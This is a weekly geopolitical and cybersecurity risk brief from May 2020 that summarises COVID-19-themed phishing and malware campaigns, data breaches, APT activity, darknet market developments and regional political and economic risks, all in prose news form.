Geopolitical and Cybersecurity Risk Weekly Brief 26 May 2020

26 may 2020

COVID-19 Cybersecurity Update

The US Federal Trade Commission (FTC) has warned users about scam coronavirus (COVID-19) contact tracing texts. There has been an increasing number of SMiShing messages asking users to click a malicious link. The FTC claims that clicking the link will download software onto the device, enabling scammers access to personal and financial information. Best practice is to ignore and delete these messages.

Outsourcing company Serco has apologised after accidentally sharing the email addresses of almost 300 coronavirus contact tracers. An employee had used the 'CC' email option instead of the 'BCC' section; the firm is now in violation of data protection rules and at least one member of staff has raised the issue with the Information Commissioner's Office (ICO).

Threat actors have been impersonating the US Navy Federal Credit Union to steal victims' Microsoft Office 365 credentials. The phishing emails use the current economic crisis caused by the coronavirus as a lure and state the user has received USD1,100 due to the pandemic. Instead, the malicious link takes them to a credential-stealing page.

A new Adwind RAT campaign has been targeting Indian co-operative banks using coronavirus as a lure. Attackers can "take over the victim’s device to steal sensitive data like SWIFT logins and customer details and move laterally to launch large scale cyberattacks and financial frauds." The emails present coronavirus guidelines or discuss financial transactions, asking the recipient to download a .zip file which contains the malware.

Microsoft Security Intelligence and other security researchers have revealed a new TrickBot malspam campaign using COVID-19 ph ishing lures. Trickbot remains one of the most common payloads in coronavirus related campaigns. The new malspam offers a "personal coronavirus check".

Threat actors have been abusing remote environments, online file sharing and cloud storage tools with COVID-19 lures. One of the companies targeted was a global financial institution, and another was an international law firm. A malicious file is shared with the victim on a file-hosting service, with the file using similar logos to the platforms to create an air of legitimacy. The victim is eventually led to a credential theft site, where they are asked to enter their account information.

A new version of the ZLoader (also known as Zeus Sphinx, Terdot and DELoader) malware has been observed distributing over 100 phishing campaigns since the start of 2020. These have targeted users in the US, Canada, Germany, Poland and Australia with coronavirus-themed lures and invoices. Since the payments in this campaign are initiated from the customer's computer using their correct stolen credentials, the transactions do not raise suspicion with the bank.

New samples of Android Trojans that continue to target Turkey with coronavirus-themed messages have been identified. In these attacks, the threat actors use Android Package files (APKs) to bypass the Google Play Store and download the fake apps on the victim's phone without verification. One APK claims to offer “money refund because of coronavirus” to Turkish users, which if downloaded contains the Cerberus banking Trojan. Other malicious APKs also offer 20GB of free mobile data but contain the Anubis banking Trojan.

 

Attacks and cybersecurity news

In a statement to the stock market, EasyJet said that it has “been the target of an attack from a highly sophisticated source”. Nine million customers' flight details and personal information is reported to have been stolen, along with 2,200 customer credit cards. The airline has also notified the UK NCSC and Information Commissioner’s Office (ICO). CEO of EasyJet, Johan Lundgren, warned customers to remain vigilant for scams linked to COVID-19, admitting that their personal information is now in the hands of cybercriminals.

A new Winnti group campaign is targeting the video game industry in South Korea and Taiwan with a Trojan backdoor, dubbed PipeMon. A massively multiplayer online (MMO) game developer was breached by Winnti. The group was able to compromise the company’s build orchestration server, allowing them to take control of the automated build systems. The Winnti Group, active since at least 2012, is responsible for high-profile supply-chain attacks against the software industry, leading to the distribution of trojanised software (such as CCleaner, ASUS LiveUpdate and multiple video games) that is then used to compromise more victims in other cyber-espionage campaigns.

NSO Group has been found using a spoofed Facebook login page, which has been crafted to look like an internal Facebook security team portal, to lure victims. Once victims login, they are infected with the Pegasus spyware. The journalists also discovered that a server used by NSO's system to deliver malware was owned by Amazon. Researchers claim that this is another piece of evidence that "NSO has been willing to impersonate Facebook and use U.S.-based infrastructure to launch its malware".

 

Data breaches, fraud, and vulnerabilities

Data Breaches

All major ransomware strains remain a significant threat. The operators of the Maze ransomware have attacked and leaked data from three US companies, Optimata, Universal Window & Door, and Liberty Title Michigan. The operators of the Sodinokibi (REvil) ransomware have claimed responsibility for attacking and stealing data from FARO Technologies - a US-based company which "designs, develops, manufactures, markets and supports software driven, three-dimensional (3D) measurement, imaging and realization systems."

The Florida Department of Economic Opportunity has reported that the Florida Unemployment System had suffered a data breach after being attacked by an unknown threat actor. The department has notified 98 people that have been impacted by the incident. However, the total number of citizens affected, and the type of data exposed in the breach have yet to be disclosed.

Bank of America has disclosed a security incident which impacted its online platform for processing loan requests filed by US companies for the Paycheck Protection Program (PPP). BoA informed users that some of the data from companies who applied for the loans may have been viewed by other banks or organisations. This incident was blamed on a test platform managed by the US Small Business Administration: applications submitted to the test server were visible to other parties with access to the test platform.

A security researcher has discovered an exposed Elasticsearch instance belonging to Advanced Info Service (AIS), Thailand's largest mobile network operator. The database contained approximately 8.3 billion records, comprising DNS query logs and NetFlow logs for AIS customers. This incident once again demonstrates the difficulties that security researchers often face when attempting to notify responsible parties of a data breach. Even if this database held 8.3 billion records of sensitive PII, the researcher would have likely experienced the same issue, which could have risked more serious repercussions.

Security researcher Bob Diachenko has found the personally identifiable information (PII) of over 13 million families registered with the Mukhya Mantri Parivar Samridhi Yojna (MMPSY) exposed publicly. MMPSY is one of the largest social security programmes in India. This type of sensitive data could allow for a range of fraud and identity theft to be committed under these users' names.

Japan’s defence ministry is investigating a possible leak of the details of a state-of-the-art missile in a large-scale cyber-attack on Mitsubishi Electric. Performance requirements that were sent to several defence-industry companies are believed to have been stolen by the attackers. These were part of the bidding process that the Japanese government offers for defence industry contracts. Mitsubishi did not win the bid.

Fraud

England and Wales police officer recruitment programme, Police Now, was attacked between 30 April and 5 May 2020. Threat actors targeted the scheme, which trains graduate detectives for 30 different forces, sending emails to applicants that masqueraded as PoliceNow and contained a malicious URL. A single mailbox belonging to PoliceNow was compromised to send the phishing emails. So far, 73 people have been impacted after contacting the PoliceNow programme. Investigators found that 63,000 emails have been sent in total from the mailbox. The true number of those affected could be higher.

UK retailer, Páramo, has fallen victim to a Magecart breach that involved a web skimmer on its checkout page for the last eight months. Despite regular security scans, Magecart attackers were able to compromise the site’s checkout page and insert a small line of JavaScript that copied card details entered, destined for PayPal and sent them to the attacker's server. The data transferred included names, addresses, card numbers and CVV codes.

Earlier in the week, the FBI warned that Magecart threat actors were exploiting a three-year-old vulnerability, tracked as CVE-2017-7391, in Magento Mass Import (MAGMI), a Magento plugin. The bug can be abused to take control of online stores and plant web skimmers.

A new phishing campaign is leveraging a fake notification from AT&T to disseminate malware. The campaign plays on users' fears of fraudulent activity taking place on their accounts. Notifications pose as a purchase receipts or tracking information to prompt users to investigate the charges. Contained is a link that installs malware onto the device. The exact type of malware used in this campaign has not been disclosed. However, it would likely allow the attackers to steal sensitive personal information and potentially hijack the user’s device.

A new series of phishing attacks has been using Google Firebase storage URLs to trick victims and bypass Secure Email Gateways (SEGs). The phishing email encourages users to click on a Firebase link which takes them to a fake login page for various applications hosted on Firebase. These have included Microsoft Office 365, Outlook, Mozilla Thunderbird, Webmail and Bank of America. Once a user enters their login details, the information is harvested and exfiltrated to the attacker.

Threat actors are using new techniques to bypass security controls in Office 365. One of these includes adding a CAPTCHA page in the chain of redirects that ends on a phishing template for login credentials. The phishing emails claim to be from the US Supreme Court and masquerades as a subpoena for a hearing. The threat actors put effort into making this campaign appear credible. Users should be suspicious of messages about an urgent task, especially since many of these phishing attempts are currently using coronavirus-themed lures to add a sense of fear and urgency to campaigns.

Vulnerabilities

Threat group HackersOfSavior has defaced thousands of Israeli websites using a WordPress plugin called uPress. Over 2,000 sites have been compromised to display an anti-Israel and anti-Zionist message. They were also injected with malicious code seeking permission to access visitors’ webcams. uPress stated that the hackers exploited a vulnerability in their plugin to compromise Israeli sites hosted on the platform.

We recommend updating the products below as soon as possible in line with your organisation’s product update schedule:

  • Microsoft Windows Docker Desktop Service – CVE-2020-11492, a privilege escalation vulnerability
  • Multiple vulnerabilities in Schneider Electric and Sensormatic Electronics ICS products
  • Authentication bypass vulnerability in certain Epson projectors
  • Memory corruption vulnerability in GNU glibc ARMv7
  • Critical pre-authentication remote code execution vulnerability in Cisco Unified Contact Center Express
  • VMware has issued a security advisory for a high-risk code injection vulnerability in its own products
  • New vulnerability, NXNSAttack, exists in the DNS protocol and would allow attackers to turn small requests into much larger payloads, overburdening resolvers.
  • US CISA issued two security advisories regarding vulnerabilities in ICS products belonging to Emerson and Rockwell Automation
  • New vulnerabilities disclosed in several Adobe products
  • Five unpatched 0days have been found in Microsoft Windows, three of which could allow an attacker to escalate privileges on an affected system
  • Multiple remote code execution vulnerabilities in Nitro Pro PDF


APT Activity and Malware Campaigns

APT activity

New information about the Ke3chang group (aka APT15) and its involvement in a recent attack campaign has been disclosed. Three new samples linked to the group were uploaded to VirusTotal in mid-May 2020: they share the same code as older samples Ketrican and Okrum. The new malware has been dubbed Ketrum. Ke3chang is a Chinese threat group that reportedly operates on behalf of the government. It has been linked to several high-profile attacks and has a global reach. Examples include attacks against European ministries, Indian embassies, and British military contractors.

Okrum and Ketrican were deployed in the group’s last campaign in 2019 against diplomatic targets in Slovakia, Belgium, Chile, Guatemala and Brazil. They have been used since 2015 to the present day, with various updated versions noted by researchers. It is likely that the Ketrum backdoor is being similarly deployed.

A new threat actor, dubbed LeeryTurtle, is targeting cryptocurrency exchange companies worldwide. The group has been active since at least 2017, using spear-phishing to deliver custom-made malware. LeeryTurtle does not appear to focus on any particular region, but it mainly targets those in technical and executive roles. The group employs sophisticated reconnaissance techniques - sending decoy emails with non-malicious attachments to monitor which targets open and download them. Research into the group also suggests that they target specific users and conduct extensive research into their personal lives to aid social engineering efforts.

A cyberespionage campaign linked to Iranian APT Chafer has been identified. Victims include air transportation firms and government agencies in the Middle East. Interestingly, these attacks were only carried out during the weekends and leveraged attacker-created user accounts. This technique enabled Chafer to maintain a presence on one compromised system for over 18 months. Both Kuwait and Saudi Arabia were targeted in this campaign.

A Nigerian business email compromise (BEC) group, ScatteredCanary, has been targeting US unemployment systems and coronavirus relief funds provided under the CARES Act. The group has used the IRS and state unemployment websites to file hundreds of fraudulent claims on behalf of US citizens and fraudulently received benefit payments. This research comes just days after the US Secret Service issued an alert regarding multiple fraudulent unemployment claims being filed by Nigerian threat actors. This alert listed Washington as the most targeted state, followed by North Carolina, Massachusetts, Rhode Island, Oklahoma, Wyoming, and Florida. It is highly likely that ScatteredCanary is at least one of the groups that to which the alert refers.

Iranian cyberespionage group Greenbug has been actively targeting telecommunications companies in South Asia since at least April 2019; the most recent attacks were observed in April this year. The group uses emails as an initial infection vector followed by the Covenant post-exploitation framework to gain an initial foothold in target organisations.

Malware

Researchers have identified a new Android malware with a variety of malicious features that include stealing funds from the victim's bank account or cryptocurrency wallet. The malware is called "Defensor ID" and has English and Portuguese versions available on the Google Play Store. It successfully bypassed the security checks on the Play Store by removing all potentially malicious functionalities but one, abusing Android's Accessibility Service.

Operators of the RagnarLocker ransomware are using a new method to evade detection. It deploys as a full virtual machine on each targeted device to hide the ransomware from view. In a recent attack, the ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine. Running the ransomware inside the VM allows the processes and behaviours to run unhindered, because they are not scanned by security software.

Researchers have observed a new bot with a similar design to the Zeus banking Trojan (aka ZLoader, Zeus Sphinx, Terdot and DELoader). Silent Night, as researchers called it, is being distributed via COVID-19 lures to victims in North America. Elsewhere, a separate ZLoader campaign is being disseminated using similar tactics in Canada, Germany, Poland and Australia.

A new malware campaign has been discovered spreading a modified version of DenDroid, dubbed WolfRAT. The campaign is targeting Android users in Thailand on WhatsApp, Facebook Messenger, and Line. WolfRAT has been linked to an organised cybercrime group - WolfResearch - which specialises in developing interception and cyber-espionage malware.

Darknet

The darknet market Europa has gone offline. Earlier this week, the markets homepage was replaced by a seizure notice, mimicking those seen after the FBI took down AlphaBay. However, users soon detected multiple errors in the takedown notice, indicating it is likely fake. Many users believe this was a transparent attempt to provide cover for an exit scam, but this has yet to be confirmed. Europa was a relatively small market and so its exit (if that is what has occurred) is unlikely to have a significant impact. However, Europa was noteworthy because it was one of the few current markets to allow the sale of firearms and fentanyl. Consequently, vendors selling these products will now have to find a new market on which to sell their wares.

Empire is currently experiencing severe issues related to market uptime. Since the Empire admin partnered with the Dread admin on a DDoS mitigation system, their uptime has been relatively consistent. However, Empire market was unavailable for much of last week. This is likely to have been caused by a DDoS attack, suggesting the attackers have found a way to circumvent the mitigation system. It remains unclear whether rival markets or law enforcement are behind these attacks, but Empire’s prominence means the DDoS attacks are having a significant impact.

Since it first began gaining traction as a potential treatment for COVID-19, the demand for hydroxychloroquine has increased rapidly. This is also noticeable on the darknet, where Cyjax has observed both the quantity and price of this drug rising steeply. If markets are now allowing legitimate vendors to sell hydroxychloroquine, then it is possible this drug will see a resurgence across the darknet. Clearly the demand exists, despite the ongoing public debate concerning the effectiveness of the drug as a COVID-19 treatment. However, the barriers of sourcing and the stigma of potential scammers may limit the number of legitimate vendors who choose to sell it.

Cyjax identified a post on the darknet forum Exploit[.]in from the Cerberus operators, stating Cerberus v2 is now available to purchase. The operators previously notified customers that Cerberus v2 was in the testing stage, but this latest post suggests it is now fully operational. Support for Cerberus v1 has now ended; it is free for existing customers to upgrade to Cerberus v2. Considering Cerberus is one of the most popular banking Trojans, we expect v2 to be rapidly adopted and integrated into cybercrime operations.

 

COVID-19 Geopolitical Threats and Impacts

Americas

In a statement released on 16 May, the Ecuadorian ministry of mines and non-renewable natural resources confirmed the imminent re-start of mining operations after the government’s committee for emergency operations, or COE, approved their resumption. The announcement has prompted concern among some residents who live near mines over whether the resumption of mining will increase the spread of COVID-19. Ecuador has been one of the worst-affected countries in Latin America. The move, however, marks a major development in the gradual normalisation of mining companies’ operations in Ecuador. Companies should resume operations under strict sanitary protocols and social-distancing guidelines.

On 19 May, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) imposed sanctions on China-based logistics company Shanghai Saint Logistics for acting as a general sales agent (GSA) for blacklisted Iranian airline Mahan Air. The measure freezes any US-held assets of Shanghai Saint Logistics and generally prohibits US persons from doing business with the company. Mahan Air has been under US sanctions since 2011, imposed over its links to Iran’s Islamic Revolutionary Guard Corps (IRGC), which the US considers a terrorist organisation. The timing of the sanctions against a China-based company amid tensions over the COVID-19 crisis indicate that commercial retaliation against Beijing was likely an important consideration. In the short-to-medium terms, companies should anticipate an increased enforcement of US sanctions, including of companies partnering with sanctioned entities in countries including Iran, Syria, and Venezuela.

Prior to this, on 15 May, the US Department of Commerce announced new export controls targeting Chinese technology giant Huawei’s access to semiconductors made abroad with US technology. Under the new rules, overseas chip makers using US technology and software in semiconductor design are barred from supplying Huawei without the permission of US authorities. The new rules came into force on 15 May; however, an exemption has been granted to products made or shipped within the next 120 days to mitigate supply-chain disruption. The move adds to prior US restrictions on Huawei imposed amid an intensifying Sino-US trade and geopolitical rivalry, and accusations from Washington over the company’s equipment being used for espionage on behalf of China. The measure also comes amid worsening Sino-US political relations due to the COVID-19 pandemic.

Taiwan Semiconductor Manufacturing Company (TSMC), the world’s most valuable semiconductor company, has announced it will build a chip factory in Arizona amid US government efforts to bolster domestic manufacturing of advanced technology products. TSMC said that construction on the USD12 billion plant would begin in 2021, with production envisaged to begin in 2024. TSMC’s announcement marks a successful example of the US government’s efforts to enhance the domestic production of components in advanced technologies.

APAC

Australia’s iron ore exports to China may be affected by changes in China’s custom’s procedures due to begin in June. China has already imposed tariffs on or blocked imports of Australian beef and barley in an explicit response to Canberra’s efforts to launch an international investigation into the origins of the COVID-19 pandemic. Beijing opposed the move, but the World Health Organization subsequently agreed to an inquiry into the international response to the pandemic, a compromise seen as reflecting China’s efforts to distance itself as a source of the disease. China’s use of its powerful trading position is a long-established foreign policy tactic to penalise or reward according to other countries’ conduct and behaviour. Western companies in China should prepare for further moves by the authorities against their expatriate staff and operations in the six-month outlook.

Reuters reported on 18 May that the Myanmar police had seized a huge quantity of illicit drugs, including the largest ever amount of the synthetic opioid fentanyl largely absent among illicit narcotic users outside North America to date. No date was given when the seizure, which also resulted in at least 140 arrests, was made. Government agencies in the US and Canada report the illicit use of fentanyl and its derivatives have led to more than 130,000 overdose deaths in North America over the past five years. There are now concerns Asia-based organised criminal groups are seeking to create new markets for the powerful and exceptionally addictive opioids in Asia and Europe.

On 14 May US President Donald Trump indicated Washington could ‘cut off’ the relationship with Beijing. While Trump did not specify what this might mean, his comment marked an intensification of his rhetoric over China’s alleged concealment of the COVID-19 outbreak. China’s official response has so far been muted, although some state-controlled media have suggested Trump is suffering from psychological problems. Barely a day now passes without the important China/US trading and diplomatic relationship coming under renewed pressure. As there is little likelihood either government will seek to lower the political temperature due to domestic considerations, further strains can be expected to develop over the coming weeks.

The Asian Development Bank (ADB) warned over the weekend that the coronavirus pandemic could cost the Philippines up to USD24 billion in economic losses if the outbreak lasts for six months and the government’s efforts to offset its impact prove ineffective The ADB noted the government’s USD16.7 billion economic package intended to mitigate the cost of the pandemic by supporting businesses and individuals is far below those of other regional countries, notably Thailand and Indonesia. In a further indication of the pandemic’s threat to the country a research group reports the amount of money remitted by an estimated 10 million overseas Filipino workers, or OFWs, is set to fall by around USD6 billion this year against the USD30 billion sent home in 2019. OFW remittances, which help support more than one in 10 local households, last year comprised almost 8 per cent of GDP.

Europe

On 19 May, the UK government announced a new tariff regime – referred to as the ‘UK Global Tariff’ – to replace the EU’s external tariff from January 2021. A 10 per cent duty on car imports will continue to apply but tariffs on GBP30 billion worth of goods destined for UK supply chains will be removed. Duties on sensitive sectors such as agriculture and fishing will remain. Government representatives said the tariff will be a simplified version of the EU’s common tariff and apply to all to countries with which it has no trade agreement. Tariffs will also be cut on environmental products such as LED lamps and gas turbines.

Under the new terms, goods currently facing below 3 per cent tariffs imported from countries that do not have a trade deal with the UK will enjoy zero-tariffs. The conditions will also apply on imports from the EU if both sides fail to reach a comprehensive trade agreement before a December 2020 deadline. Indeed, the benefits of the tariff will be limited in the absence of a comprehensive trade deal with the EU. Many non-EU firms export to the UK to take advantage of unhindered access to the mainland European market. While the UK aims to replicate the existing trade benefits enjoyed with EU membership, this presently seems unlikely due to a stalemate in negotiations. Notably, other countries are not required to lower their own tariffs to UK imports. Firms importing goods into the UK should assess the impact of the new tariff regime on operations and factor sourcing strategies accordingly.

The Polish government has approved new rules aimed at deterring non-EU firms from acquiring Polish companies deemed strategically important that have been adversely affected by the COVID-19 crisis. The regulations, which will be binding for two years and apply to firms with over EUR10 million in two financial years before a planned takeover, are part of a government rescue package worth over PLN300 billion (around EUR66.3 bn) to boost the economy. The UOKiK competition body will be responsible for overseeing planned takeovers. This forms part of an EU-wide trend where governments are implementing new controls to prevent hostile takeovers from overseas investors, particularly entities with links to foreign states. France and Germany have implemented similar measures. Sectors such as defence, technology and healthcare, which will attract heightened regulatory scrutiny.

French finance minister, Bruno Le Maire, said on 14 May that the government would move ahead to implement a tax on major technology firms this year, regardless of any progress on setting up an international levy. During a conference call, Le Maire said, “never has a digital tax been more legitimate and more necessary.” Meanwhile, the Czech Republic has indicated that it could delay introducing its own digital tax until 2021. A number of other EU countries, including Italy, have either introduced or plan to implement new digital taxation. Given that the current US administration sees tariffs as a key tool to achieve foreign policy and trade objectives, Washington will probably impose tariffs on countries that have introduced or are planning a digital tax. Companies relying on EU-US trade should factor the impact of tariffs on strategic planning.

On 12 May, the Riigikogu – Estonia’s lower house of parliament – passed amendments to a telecommunications law covering the development of future networks. In a statement, the Riigikogu said the legislation was needed to ensure the ‘quality of networks, minimise the impact of cyber-attacks, and prevent political manipulations’. While not explicitly mentioned in the legislation, the amendments are probably aimed at increasing political scrutiny on Huawei, a major telecommunications firm with alleged close ties to the Chinese government. This comes as the country, with a thriving technology sector, is preparing to roll-out 5G networks. The issue of Huawei’s involvement in 5G has become a conundrum for countries across the EU. Washington has pressured close allies to impose an outright ban on the firm but some, including the UK, have resisted and opted for a more moderate approach. The legislation in Estonia will create challenges and additional requirements for telecommunications firms, particularly when sourcing equipment for new infrastructure.

MENA and Central Asia

Human rights groups claimed on 21 May that Algeria had sentenced a number of opposition activists to jail over Facebook posts. Rights groups and anti-government activists have denounced the convictions as the latest sign of increased repression since the COVID-19 pandemic stifled widespread popular mobilisations in March. Weekly anti-government protests had been taking place since February 2019; after bringing down former president Abdelaziz Bouteflika in April 2019 the protesters continued demanding an overhaul of Algeria’s governance system. The unrest largely came to a halt as authorities banned marches as part of movement restrictions put in place to contain the spread of COVID-19. Activists say the government has exploited the outbreak to intensify its crackdown, continuing to target opponents, journalists, independent media and internet users. Staff managers should monitor the situation and anticipate elevated security presence in the vicinity of protests.

Lebanese media reported protests in front of an unidentified electricity company and the Deir Ammar Power Plant. Lebanon has suffered from power shortages for decades, following years of civil unrest, inertia at the policy-making level, and political instability. Lebanon has a total capacity of just over 2,000 MW compared to peak demand of 3,400 MW. In April 2019, the government approved a long-awaited plan to reform its electricity sector, although little progress has been made and the situation has only worsened due to the country’s financial crisis that has been exacerbated by the COVID-19 pandemic. Additional protests are likely to target Lebanon’s energy sector including at electricity companies and power stations in the coming three- to six-month period.

On 18 May, Libyan forces allied with the UN-backed Government of National Accord (GNA) seized control of the Watiya airbase, some 144km south of the capital Tripoli, from Field Marshall Khalifa Haftar’s Libyan National Army (LNA). Small-scale clashes were reported between GNA and LNA forces before the LNA withdrew, reportedly for tactical reasons. Military spokesman Mohamed Gnunu confirmed in a tweet that the GNA had taken over the entire base. The announcement marks a major setback for Haftar, who had held the airbase since 2014, and comes after a month-long counter-offensive by the GNA and its allies that has driven the LNA out of much of Libya’s western coast.

Haftar’s foreign backers will likely aim to increase their support in the coming one- to two-month period as a bulwark against this possibility. Meanwhile, fighting is likely to continue as the capture of Watiya will free up GNA troops to put pressure on Haftar’s forces south of Tripoli. Security managers should monitor the situation and ensure that travel is conducted with strict security protocols in place. Professional security advice and support should be sought prior to travel.

Iraq’s government has agreed with international oil majors operating in five large southern fields that they will cut their output by 300,000 barrels per day (bpd), according to a report in Reuters on 13 May. Baghdad will reduce its oil production in other fields by another 400,000 bpd. Officials were unable to reach agreement on a larger cut, highlighting the little leverage that Baghdad has over foreign oil companies operating in its borders. A senior official at Iraq’s Basra Oil Company (BOC) said that the cut of around 300,000 bpd is considered nominal. Foreign companies should monitor the situation and factor this potential into strategic planning.

Flag carrier Qatar Airways said on 13 May it will lay off nearly 20 per cent of its workforce due to the impact of COVID-19 pandemic on global travel demand. The carrier’s chief executive officer, Akbar Al Baker, said rehiring affected employees would be the first priority once business returns to full capacity. According to IATA figures, Qatar has seen 8 million fewer passengers in recent months resulting in a USD1.7 billion revenue loss, risking 70,000 jobs and USD2.8 billion in contribution to government revenue. Qatar Airways is a major carrier in the region, employing nearly 47,000 people worldwide. Companies partnering with Qatar Airways and other regional airlines should engage with stakeholders to ascertain the impact of the situation on staffing, operations, and strategy.

French energy company Total said on 18 May its planned purchase of assets in Algeria as well as Ghana from US company Occidental Petroleum (Oxy) had fallen through after the Algerian government rejected the deal there. Acquiring oil and gas assets in Algeria were part of an USD8.8 billion deal reached by the companies on the African assets of Anadarko Petroleum, which was bought by Oxy in 2019. Algeria's government objected to the deal, and the energy ministry said on 6 May that the country would maintain Anadarko’s contract with state oil company Sonatrach, with Oxy continuing investment in the country.

Algeria’s new hydrocarbon law, designed to reverse declining foreign upstream investment through improved contract terms and tax rates, came into force in early January. The law is aimed at making investment in its oil and gas industry more attractive to foreign companies and bolstering Algeria’s energy production amid falling oil and gas revenue. However, the government has expressed opposition to the Total deal for months. The deal has also been a source of agitation for anti-government protesters who rallied throughout much of 2019. Companies with oil and gas operations in Algeria should monitor the situation and factor the development into strategic and operational planning.

Prime Minister Hassan Diab said that Lebanon will begin to gradually re-open the economy from 18 May. During a televised speech on Sunday, Diab also warned the Lebanese public to strictly adhere to health and safety guidelines including social distancing that had been flouted during a previous attempt at re-opening. Factories, wholesale markets and distribution warehouses, stores, and hotels are allowed to re-open. Reduced working hours will be required in many cases, including restaurants and cafes which will be allowed to open from 0500 to 1900. These will also only operate at 50 per cent capacity and will not serve shisha (water pipe). Meanwhile, anti-government protests are continuing and is likely to continue. Security managers should monitor the situation and plan for increased security measures in the vicinity of protests.

The main warring parties in Syria have agreed to resume talks in Geneva aimed at achieving lasting peace for the country, according to the UN special envoy for Syria, Geir Pedersen, on Tuesday (19 May). Pedersen said in a UN video press briefing that talks will take place as soon as the COVID-19 pandemic allows, although no agenda for the next meeting has been agreed on. Pedersen also said a virtual meeting would not be possible. Local media reports in the past two weeks state Syrian army troop movements suggest preparations for a military campaign to unilaterally retake the M4 may be underway, with speculation that this could occur following the Eid al-Fitr holiday on 23 and 24 May, which marks the end of the holy month of Ramadan. Any such activity would present a major spoiler for future peace talks, though a restraining factor will be Russia’s desire to preserve good relations with Turkey amid its stated goal to find a political solution to the conflict.

A British-flagged chemical tanker was attacked by armed pirates in the Gulf of Aden on 17 May. Six pirates reportedly approached the STOLT APAL in two speedboats, some 139km off the port city of Mukalla at around 1530 local time. None of the ship's cargo was damaged. The United Kingdom Maritime Trade Operations (UKMTO) confirmed the attack on 17 May and advised extreme caution to any vessels transiting the area. It was the ninth reported attack in the Gulf of Aden this year. There is also concern that piracy, which used to be concentrated around the coast of Somalia, is now moving toward the strategic Bab el-Mandab strait amid an uptick in suspicious incidents compared to 2019.

Sub-Saharan Africa

UK-registered oil company Tullow Oil on 15 May declared force majeure on its development licences for blocks 10BB and 13T in the South Lokichar basin in Kenya, according to several local news reports. This is due to a serious drop in demand caused by the oil-price war between Russia, Saudi Arabia, and the US, and travel restrictions imposed to slow the spread of COVID-19. The incident will likely delay Tullow’s final investment decision for the project which it had expected to sign by the end of this year, signalling further delay in getting the project online. In parallel, the company is facing continued hiccups at its other investments in Ghana and Uganda, where growing local opposition could put a break to development plans there.

Nigerian Minister of Aviation, Hadi Sirika, said on 17 May that authorities had impounded an aircraft operated by a UK-based airline called Flair Aviation. In a tweet, he accused the company of operating a commercial flight to the country in violation of a ban on international flights that will remain effective until 4 June at least. There is no UK-based company of that name. However, there are companies with that name registered in Canada and Germany. According to an aviation ministry spokesperson to whom Reuters spoke on 17 May, the company is based in the UK but is called FlairJet and is a franchise of US-based airline FlexJet. Corporate communications departments of named companies should take steps to clarify the messaging in international broadcast media to mitigate the risk of serious reputational damage during the COVID-19 pandemic. More broadly, compliance officers at airlines and related logistics operators included in exemptions for humanitarian or essential needs during the COVID-19 pandemic should ramp up their monitoring and internal communications efforts of government responses to ensure compliance throughout the company’s global operations.

South African state-owned power utility Eskom is in informal discussions with the World Bank Group to change the terms of a USD3.5 million loan in order to avoid having to spend money to cut sulphur oxide emissions from one of its largest power plants. Eskom confirmed that discussions are ongoing, but that no formal decision has been taken. Despite the lack of a formal decision, the report underscores the country’s dire economic outlook, which is signalling a significant downturn over the coming year. Several of the country’s many state-owned enterprises, such as Eskom but also airlines such as South African Airways and SA Express, are highly indebted and are struggling to service their obligations.

Senegal media reported on 19 May that police had seized EUR1.92 billion worth of fake bank notes, denominated in euros, and arrested several suspects in the Mbao area of Pikine, the country’s second-largest city located about 25km east of central Dakar. Media reports are also alleging the major fraud scheme was being orchestrated by an extensive criminal network, including several former high-ranking officials. The seizure is likely to lead to money-laundering and fraud prosecutions of some of those arrested. The case also underscores the risk of fraud to businesses with operations in Senegal, which is a cash-based economy. The sheer volume of cash seized also suggests that great amounts of euro-denominated bank notes may be in circulation across the country, exposing staff and companies to security risks. Companies which manage large amounts of cash should review their internal processes for spotting fake bank notes and ensure that all staff, in particular frontline workers who deal with the cash, are aware of the latest techniques used by bank note fraudsters.

The Madagascan central banking institution, Banky Foiben'i Madagasikara (BFM), announced on 20 May that it has temporarily suspended foreign exchange operations in the capital Antananarivo, as well as the cities of Toamasina, Fianarantsoa, and Ambatondrazaka. This is to ensure currency traders can respect the government’s recommendations for physical distancing to slow the spread of COVID-19 in-country. All the affected cities are located in regions that are currently under strict travel restrictions and curfews. While the BFM did not say when it anticipates operations to resume, the suspension is likely to remain in place for as long as the lockdowns of Analamanga, Atsinanana and Haute Matsiatra regions remain in place. Managers should conduct online transactions where practical and inform their clients and service providers about the interrupted service to mitigate the risk of penalties and other additional fees.